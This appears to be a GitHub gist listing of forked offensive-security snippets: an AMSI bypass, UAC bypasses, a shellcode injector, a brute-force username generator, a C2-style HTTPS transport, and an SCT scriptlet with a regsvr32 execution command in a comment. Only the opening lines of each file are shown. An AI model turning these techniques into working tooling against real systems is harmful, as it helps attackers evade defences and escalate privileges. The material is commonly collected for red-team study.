- https://www.vx-underground.org/archive.html
- https://www.vx-underground.org/windows.html
- https://doxygen.reactos.org/index.html
- https://www.hexacorn.com/
- https://modexp.wordpress.com/
- https://klezvirus.github.io/
- https://zerosum0x0.blogspot.com/
- https://www.binarly.io/posts/index.html
- https://0xdarkvortex.dev/blogs/
Yeah9782 Yeah9782
Yeah9782
/ All-Mal-Dev.md
Created
August 21, 2024 18:16
— forked from 0prrr/All-Mal-Dev.md
Malware Dev Reading List
No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.
Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.
- A Russian translation of this article can be found here, contributed by Timur Demin.
- A Turkish translation can be found here, contributed by agyild.
- There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.
Yeah9782
/ namemash.py
Created
June 1, 2023 12:46
— forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| ''' | |
| NameMash by superkojiman | |
| Generate a list of possible usernames from a person's first and last name. | |
| https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/ | |
| ''' |
Yeah9782
/ patchless_amsi.h
Created
August 19, 2022 16:26
— forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ifndef PATCHLESS_AMSI_H | |
| #define PATCHLESS_AMSI_H | |
| #include <windows.h> | |
| static const int AMSI_RESULT_CLEAN = 0; | |
| PVOID g_amsiScanBufferPtr = nullptr; | |
| unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) { |
Yeah9782
/ example.sct
Created
August 14, 2022 23:12
— forked from nicholasmckinney/example.sct
SCT File Obfuscation Examples:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| //x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll |
Yeah9782
/ rwxHunter.cs
Created
August 14, 2022 23:12
— forked from nicholasmckinney/rwxHunter.cs
Locate a RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtuallAlloc Call
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
Yeah9782
/ transport_https.c
Created
July 24, 2022 18:15
— forked from Cracked5pider/transport_https.c
perform HTTPs requests using WinHTTP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize ) | |
| { | |
| #ifdef TRANSPORT_HTTP | |
| HANDLE hConnect = NULL; | |
| HANDLE hSession = NULL; | |
| HANDLE hRequest = NULL; | |
| DWORD HttpFlags = 0; | |
| LPVOID RespBuffer = NULL; |
Yeah9782
/ akagi_42b.c
Created
July 11, 2022 21:33
— forked from hfiref0x/akagi_42b.c
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef interface IFwCplLua IFwCplLua; | |
| typedef struct IFwCplLuaInterfaceVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in IFwCplLua * This, | |
| __RPC__in REFIID riid, | |
| _COM_Outptr_ void **ppvObject); |
Yeah9782
/ akagi_41.c
Created
July 11, 2022 21:33
— forked from hfiref0x/akagi_41.c
UAC bypass using CMSTPLUA COM interface
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef interface ICMLuaUtil ICMLuaUtil; | |
| typedef struct ICMLuaUtilVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in ICMLuaUtil * This, | |
| __RPC__in REFIID riid, | |
| _COM_Outptr_ void **ppvObject); |
Yeah9782
/ akagi_58a.c
Created
July 11, 2022 21:32
— forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef interface IEditionUpgradeManager IEditionUpgradeManager; | |
| typedef struct IEditionUpgradeManagerVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in IEditionUpgradeManager * This, | |
| __RPC__in REFIID riid, |
NewerOlder